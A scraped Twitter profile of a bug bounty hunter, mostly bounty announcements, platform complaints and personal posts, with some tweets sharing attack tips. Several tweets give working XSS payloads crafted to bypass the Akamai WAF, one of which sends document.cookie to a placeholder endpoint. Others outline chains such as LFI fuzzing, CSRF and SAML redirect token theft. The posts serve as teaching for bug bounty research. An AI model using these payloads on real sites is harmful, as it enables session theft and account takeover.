Rachid.A @zhero___ Twitter profile

Pinned Tweet

Rachid.A

@zhero___

2 months

happy to release my new article entitled: Next.js and cache poisoning: a quest for the black hole good reading;

33

147

594

Last Seen Profiles

@megatdanial

@penyukastw21

@yoonccats

@feet_promoter

@2_3Rings

@xkk622zdb5

@Shethamm

@LylaSanps

@kkauzinhaw

@OrmsideCentre

@mattdomingos

@ShadowBendy_

@lastbornhitler

@PrepDogNow

@ae_timmerman

@Daisy_Kerri96

@Maui

@Nexis_Labs

@SundayIsTheDay

@Desingsterr

@SundayIsTheDay

@yehet_go

@k4dr213

@Sharpie

@bri_guy_ai

@redballoonsue

@teewarx

@july10

@BIN_HAWESHI1

@ThuggerDaily

@UnrealCapital

@onyourmanu_

@playVALORANTsa

@idontfyall

@henry_proger

@Suffolk311

Rachid.A

@zhero___

1 year

Stored XSS via cache poisoning 🧪 the Akamai WAF really annoyed me, but the craft of this payload defeated it : "><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"> #bugbountytips #BugBounty #Hacking

22

185

630

Rachid.A

@zhero___

3 years

🔎Pourquoi Muslim Network ? 🚀 #Muslim #Islam

9

586

432

Rachid.A

@zhero___

2 months

instead of heading towards what everyone else is looking for explore a vulnerability that you like dive deep into the topic, invest, set up a small lab and look for specific cases or recurring vulnerabilities in any software It might take a while but your efforts will be worth it

19

36

441

Rachid.A

@zhero___

5 months

research => interesting discovery => pattern recovery + template creation => axiom + nuclei => mass scan (BB programs) => double check and report Ramadan mubaarak to all Muslims, take advantage of this month to get back to essential things! #BugBounty

23

33

342

Rachid.A

@zhero___

1 month

going to the gym is good, but it doesn't help finding 0d (?)

18

3

214

Rachid.A

@zhero___

7 months

1. Identify a URL param allowing a potential LFI 2. FUZZ the param value (GPT can help to create a custom list) 3. Find a new file/page via LFI 4. FUZZ looking for URL params reflected on this newly discovered file (...) ⬇️ #bugbountytips #Hacking

9

30

202

Rachid.A

@zhero___

8 months

Maybe a write-up soon, it's been a while I write stuff here: #bugbounty #Hacking

5

30

192

Rachid.A

@zhero___

3 months

a few bounties on @intigriti to start the week off right ⚔️ wal hamduliLlah;

11

1

179

Rachid.A

@zhero___

5 months

the cooking continues wal hamduliLlah, here are some of the dishes the "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted #BugBounty

12

7

178

Rachid.A

@zhero___

3 months

nice bounty on @intigriti that secures the first place of the program a bit more;

15

0

172

Rachid.A

@zhero___

26 days

goot hit on @immunefi ;

13

5

168

Rachid.A

@zhero___

7 months

1. Self-XSS on the personal information side 2. Search for a CSRF on the vector in question but nothing on the web app side 3. Discovery of an old endpoint on the mobile app vulnerable to CSRF (...) ⬇️ #bugbountytip #BugBounty

9

19

158

Rachid.A

@zhero___

3 months

Yay, I was awarded a $3,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

12

1

157

Rachid.A

@zhero___

3 months

someone is going to have a rough time

9

3

148

Rachid.A

@zhero___

2 months

Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

10

3

146

Rachid.A

@zhero___

3 months

moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses so, while waiting for the next articles on my recent 0d: WAF as a weapon and DOS as a bullet #infosecurity

8

27

143

Rachid.A

@zhero___

4 months

Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder the BB is also that, sometimes we come across self-respecting companies that make sure to be fair and it's frankly pleasant

15

1

137

Rachid.A

@zhero___

1 year

The hunt was good tonight al hamduliLlah If during a cache poisoning attempt the X-Http-Method-Override header is taken into account by the server (and the response cached) take the time to test all HTTP verbs, you might have some interesting behaviors #bugbountytips #BugBounty

11

18

131

Rachid.A

@zhero___

11 months

Al hamduliLlah, two good notifications on @intigriti today; #bugbounty

13

3

124

Rachid.A

@zhero___

5 months

Be careful when testing for cache poisoning, it is rare but sometimes URL parameters are not included in the cache key. This means that even if you add a parameter to poison the cache, the param will not act as a cache buster (...) ⬇️ #bugbountytips

4

17

128

Rachid.A

@zhero___

21 days

Complete POC for an RXSS to ATO H1 triage: Medium

6

8

128

Rachid.A

@zhero___

26 days

Yay, I was awarded a $1050 + $500 bounty on @Hacker0x01 ! beyond exposing the amounts of these two not exceptional bounties, it has been two times in a row -diff programs- that I have almost seen my bounty halved so “move on” yea but not too quickly either

7

4

125

Rachid.A

@zhero___

2 months

a bit too lazy to search right now, more focused on acquiring new knowledge fortunately, my little automation sends me some good news

12

0

124

Rachid.A

@zhero___

3 months

It was my day off, but I couldn't resist checking something that was on my mind before going to sleep moral of the story, don't take days off (???)

8

6

122

Rachid.A

@zhero___

1 year

The javascript code sometimes contains treasures, read it! Developers sometimes provide certain URL parameters during development that they abandon during production. When this is the case it is rarely properly sanitized #BugBounty #bugbountytips

11

7

118

Rachid.A

@zhero___

11 months

Received, thanks @Hacker0x01 ; Unlike H1 socks, I'm more likely to wear it ✌🏽 #BugBounty

15

0

113

Rachid.A

@zhero___

1 year

The bypass of WAF - when it happens - is particularly satisfying 🥷🏽 To those concerned: Don't forget to fast 'ashura today ☝🏼 #BugBounty

11

4

113

Rachid.A

@zhero___

3 months

two interesting finds to keep the momentum going tonight's hunt went well

10

2

114

Rachid.A

@zhero___

5 months

a first for me on @immunefi ! "soon" an article on a little research that I did, allowing me to find more than 60 vulnerable assets (for the moment) #BugBounty #Hacking

7

8

110

Rachid.A

@zhero___

1 year

Take a look at my new write-up: "DOS via cache poisoning" covering some of my findings. 🧪 I briefly explain how a cache works and how this vulnerability is possible, good reading! #bugbountytips #bugbountytip #bugbounty #infosec

DOS via cache poisoning

Today I’m going to talk about cache, denial of service, and a vulnerability I recently found in a very large company.

infosecwriteups.com

4

38

104

Rachid.A

@zhero___

1 year

Yay, I was awarded a $2,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder #hackerone #bugbounty ⚙️ Auth bypass due to misconfiguration 🎯 Access to all the monitoring panel of databases in production

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

5

101

Rachid.A

@zhero___

4 months

the company was a little slow but paid off in the end first bounty on @immunefi

14

2

105

Rachid.A

@zhero___

6 months

Al hamduliLlah, I was awarded a $2,250 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

9

3

101

Rachid.A

@zhero___

2 months

Yay, I was awarded a $500 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

12

1

98

Rachid.A

@zhero___

8 days

bug bounty mafia ep. 2342952: from a $2500 to a $750 bounty and always the same fairy tales to justify themselves; beyond exposing my case and seeking justice by tagging the entire H1 team in my post, when can we expect a stricter system for companies? #BugBounty

3

98

Rachid.A

@zhero___

1 year

Recon + Python #BugBounty #hackerone

8

4

94

Rachid.A

@zhero___

2 months

worship your Lord, train yourself, and seek zero-days memento mori my friends

6

3

93

Rachid.A

@zhero___

3 months

Yay, I was awarded a $1,250 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

4

1

93

Rachid.A

@zhero___

1 year

It's a good sunday, al hamdulillah. Maybe a write-up soon on my modest Medium account : () #BugBounty #hackerone

5

8

85

Rachid.A

@zhero___

8 months

Yay, I was awarded a $1,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

7

2

88

Rachid.A

@zhero___

4 months

Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

9

1

88

Rachid.A

@zhero___

3 months

new 0d/misconfig unlocked <> a good way to start the week isn't it

6

0

88

Rachid.A

@zhero___

9 months

Al hamduliLlah, I was awarded a $750 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

3

1

85

Rachid.A

@zhero___

4 months

Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder sweet 0d;

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

5

2

85

Rachid.A

@zhero___

1 year

Start of the new season Let's see what will be the fate of these reports ☝🏼 #hackerone #BugBounty

4

3

84

Rachid.A

@zhero___

28 days

having tried new cooking options these last few days, the dish should be ready soon

1

0

82

Rachid.A

@zhero___

24 days

we are a for profit company that generates a lot of money and we invite you to our private VDP program so you can work for us for free, so, happy? (please say yes) I clearly indicated in my settings that I am not a volunteer, curious to know how they managed to get through

5

4

79

Rachid.A

@zhero___

27 days

- why does this guy have insects on his water bottle? they don't know that I have 100% valid submissions on @intigriti

8

0

75

Rachid.A

@zhero___

3 months

hey @jobertabma , @scarybeasts useful feature: be notified when the original report of a duplicate is resolved (or when adding/decreasing rep points indirectly) this isn't the first time that one of my dup reports is still valid after the original report has been resolved... ⬇️

4

1

74

Rachid.A

@zhero___

15 days

I just found a bug and got paid on @immunefi

9

1

74

Rachid.A

@zhero___

3 months

wow look at the sky

7

1

74

Rachid.A

@zhero___

5 months

we will increase the character's stats إِنْ شَاءَ ٱللَّٰهُ

4

6

75

Rachid.A

@zhero___

1 year

First vulnerability report submitted on @intigriti platform, UI is quite nice 🧩 #BugBounty

3

2

71

Rachid.A

@zhero___

6 months

small battles to bypass WAFs are always a pleasure by the way if someone needs help and wants to collaborate, Akam @i bypass (XSS) available #BugBounty #infosecurity

4

68

Rachid.A

@zhero___

4 months

other sites are also vulnerable to the “bypass” in question nothing crazy about the vulnerability here, but very interesting behavior

Rachid.A

@zhero___

5 months

the cooking continues wal hamduliLlah, here are some of the dishes the "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted #BugBounty

12

7

178

5

68

Rachid.A

@zhero___

7 months

I have access to an AEM via path trans & after a long time digging nothing juicy The interesting endpoints require changing the http verb which is impossible for me->path trans via serv-side param poll An AEM expert to inspire me before I abandon this vector forever? #bugbounty

4

0

67

Rachid.A

@zhero___

1 year

10.12.22 - Submission 11.12.22 - Internal disc. with the sec team 23.01.23 - Start of mediation 20.02.23 - Needs more info (=Vulnerability patched by the Alibaba team and therefore not reproductible) 15.08.23 - Resolved (without bounty of course) #BugBounty #hackerone #infosec

11

6

62

Rachid.A

@zhero___

10 months

🏴‍☠️New write-up on a recently found vulnerability, titled: "A web cache deception chained to a CSRF, the recipe" Don't hesitate to take a look! #bugbountytip #bugbountytips #Hacking

A web cache deception chained to a CSRF, the recipe

Recently, I received a bounty for a vulnerability discovered on an e-commerce site allowing the personal information — including the…

infosecwriteups.com

2

22

62

Rachid.A

@zhero___

7 months

Some sites do not have the same ftrs/technos depending on the region chosen, this is often aimed at providing a more relevant UX adapted to the specific needs of each region And it may be that a fix is deployed in some countries but not others /fr/ fix /sg/ still #bugbountytips

1

8

60

Rachid.A

@zhero___

8 months

Yay, I was awarded a $750 bounty on @Hacker0x01 ! #TogetherWeHitHarder Complete streak! Don't we unlock an end boss?

4

0

59

Rachid.A

@zhero___

1 year

For those who asked me how to make a payload - bypassing the Akamai WAF - for a blind XSS, or simply to retrieve cookies to its endpoint : "><input autofocus nope="%26quot;x%26quot;"onfocus="frames.location='YOUR_ENDPOINT?c='+Reflect.get(document,'coo'+'kie')"> #bugbountytips

0

16

60

Rachid.A

@zhero___

1 year

Context: XSS to account takeover. "For any reflected XSS, Confidentiality is always None" What do you think? Is he right? If yes, why? #bugbounty #infosec #hackerone

9

7

59

Rachid.A

@zhero___

7 months

Al hamduliLlah, I was awarded a $200 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

3

0

54

Rachid.A

@zhero___

2 years

Yay, I was awarded a $1,000 bounty on @Hacker0x01 ! ☝🏼 Vuln : Improper Authorization #TogetherWeHitHarder #BugBounty #infosec

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

2

0

50

Rachid.A

@zhero___

8 months

Lumberjack Payload 🪓 After a long battle (blacklisted keywords, prohibited parentheses, different types of simple apostrophes..) I got it. -> #javascript :whatever you want() in the URL hash -> frames["loca"+"tion"]=frames.location.hash[1]+.... #bugbountytips #BugBountytip ⬇️

3

11

53

Rachid.A

@zhero___

1 year

Hi @Hacker0x01 , If a company decides to literally ghost a researcher and fix the bug a few months later, is that really possible? Customers are king okay, but at this point? Not a single message from the security team in 6 months despite two mediations 🫠 #BugBounty #hackerone

3

2

52

Rachid.A

@zhero___

2 months

I was able to exploit similar behavior via a GET req this time: the value of several URL params were returned by the server then all put together in a cookie by dividing a payload normally blocked by the WAF into 3 and placing each part as a value of a param (...) #bugbounty

Rachid.A

@zhero___

3 months

moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses so, while waiting for the next articles on my recent 0d: WAF as a weapon and DOS as a bullet #infosecurity

8

27

143

6

2

53

Rachid.A

@zhero___

3 months

nothing crazy here, just a few low-hanging fruits you can smell it too, right? that scent of duplicates

3

1

52

Rachid.A

@zhero___

8 months

Yay, I was awarded a $150 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

3

0

51

Rachid.A

@zhero___

1 month

nice to see that my last research on next.js is mentioned in this episode of @ctbbpodcast with some takeaways regarding cache-poisoning take a look;

Critical Thinking - Bug Bounty Podcast

@ctbbpodcast

1 month

Latest episode is live and this week we've got a tool drop! @Rhynorater put together a script and Caido extension which coordinates with @DanielMiessler 's Fabric to help automate BBP report writing. Also, lots of reporting tips! Enjoy!

1

8

62

0

4

51

Rachid.A

@zhero___

12 days

stay healthy, be a natty guy

4

2

50

Rachid.A

@zhero___

1 year

A good sunday ☝🏼 #hackerone #bugbounty #infosec

1

3

48

Rachid.A

@zhero___

1 year

Thank you for the gifts @Hacker0x01 Currently at +780 rep points on #HackerOne having only worked on paid programs, free work for for-profit companies not being my thing. Nothing crazy, have to keep trying hard hoping that the continuity will be exponential -in shaa Allah-☝🏼

5

1

47

Rachid.A

@zhero___

2 years

Ne les oublions pas dans nos invocations

0

8

37

Rachid.A

@zhero___

7 months

Yay, I was awarded a $450 bounty on @Hacker0x01 ! #TogetherWeHitHarder ah I understand better now, sorry for asking stupid questions

2

0

48

Rachid.A

@zhero___

3 months

@bxmbn the colleague was developing his web project in the comments

7

0

47

Rachid.A

@zhero___

1 year

If you manage to cache - via any extension - a 404 response (error being caused by the addition of your extension), make sure that no confidential information is present in the source code when you are connected to an account. 🧪 #bugbountytips #bugbountytip #infosec

3

47

Rachid.A

@zhero___

2 months

cool a new bounty, I forgot this report wait

3

0

48

Rachid.A

@zhero___

7 months

Little #bugbountytip HTLMi in an email template to ATO? When we have a code inj in an email template we report it as HTMLi since it is not possible to execute JS in the different email clients Sometimes a link is provided in the email to view it in the browser>JS triggering>XSS

2

7

48

Rachid.A

@zhero___

2 months

hey @Ice3man543 , description/CVE is incorrect here, the vuln linked to the invoke header is not linked to CVE-2023-46298 [1], I did not get a CVE as explained in my research if you create an exclusive template for the invoke header remember to put my article [2] in ref, thanks!

3

1

47

Rachid.A

@zhero___

2 months

🇵🇸

3

1

45

Rachid.A

@zhero___

1 year

Al hamduliLlah, I was awarded a $750 bounty on @Hacker0x01 ! #TogetherWeHitHarder Vuln : Business logic error

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

5

0

45

Rachid.A

@zhero___

1 year

Al hamduliLlah, I was awarded a $300 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - zhero_

- https://zhero-web-sec.github.io/research-and-things/

hackerone.com

7

0

44

Rachid.A

@zhero___

5 months

besides I'm quite surprised by the stats +3000 readers, glad it's useful!

Rachid.A

@zhero___

5 months

it's okay not to master a subject, but in this case you have to ask and not act hastily it's like saying about an RCE POC, that the "id" command is not sensitive and that it is therefore not a vuln.. we have an adage which says: "science (knowledge) before words and actions!"

1

0

17

2

1

45

Rachid.A

@zhero___

1 year

Same thing without user interaction : "><input autofocus nope="%26quot;x%26quot;"onfocus="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">

1

8

44

Rachid.A

@zhero___

2 months

when I search for vulnerabilities via techniques and/or discoveries on a particular subject my duplicate rate is 0% the beaten path has its limits, the competition is tough, don't be a skid, easy money doesn't exist -almost- enjoy and be curious (sry for the linkedin aura)

1

45

Rachid.A

@zhero___

4 months

Yeay, I was awarded for a valid submission on @HackenProof #hackenproofed #bugbounty

4

2

44

Rachid.A

@zhero___

11 months

Craft, XSS and ATO After some research, I came across a POST request in my proxy which -for some reasons- caught my attention. The server was returning data in JSON format, I retrieved the parameters passed via POST then transmitted them via a GET request (...) #bugbountytips

3

0

41

Rachid.A

@zhero___

5 months

- I want to pay my bill - it's $500 - hold - but... you have nothing in your hands sir - ah it’s normal don’t worry, it’s iNtErNeT pOiNtS - 😰

🦆 SchizoDuckie 🦆

@SchizoDuckie

5 months

Presented without further comment.

10

3

90

7

0

42

Rachid.A

@zhero___

5 months

I have the annoying tendency to always start by coding things myself before realizing that it already exists fireee

GitHub - sw33tLie/bbscope: Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and...

Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi! - sw33tLie/bbscope

github.com

2

0

42

Rachid.A

@zhero___

8 months

Improper config of SAML allows the use of the relayState param to redirect the user to an endpoint owned by the attckr The redirect is done via a POST by which it returns the SAML resp after auth The value of the SAML resp can then be exchanged for an access_token #bugbountytip ⬇️

3

0

42

Rachid.A

@zhero___

7 months

🥷🏽 #bugbounty

1

40

Rachid.A

@zhero___

4 months

a bounty + positive feedback is always nice, we're not going to lie on @intigriti ;

4

0

40

Rachid.A

@zhero___

4 months

nice bypass, without parentheses or template strings, I had fun! if anyone needs help and wants to collaborate, Cloudfl @re bypass (XSS) available (Akam @i still available) #bugbounty #Hacking

Rachid.A

@zhero___

6 months

small battles to bypass WAFs are always a pleasure by the way if someone needs help and wants to collaborate, Akam @i bypass (XSS) available #BugBounty #infosecurity

4

68

3

1

40

Rachid.A

@zhero___

2 months

lately I've seen quite a few posts from hunters blocked by WAFs asking for help to transform their HTMLi into XSS guys, it's my guilty pleasure don't hesitate WAFs tend to let me pass always available for this kind of little #bugbounty collabs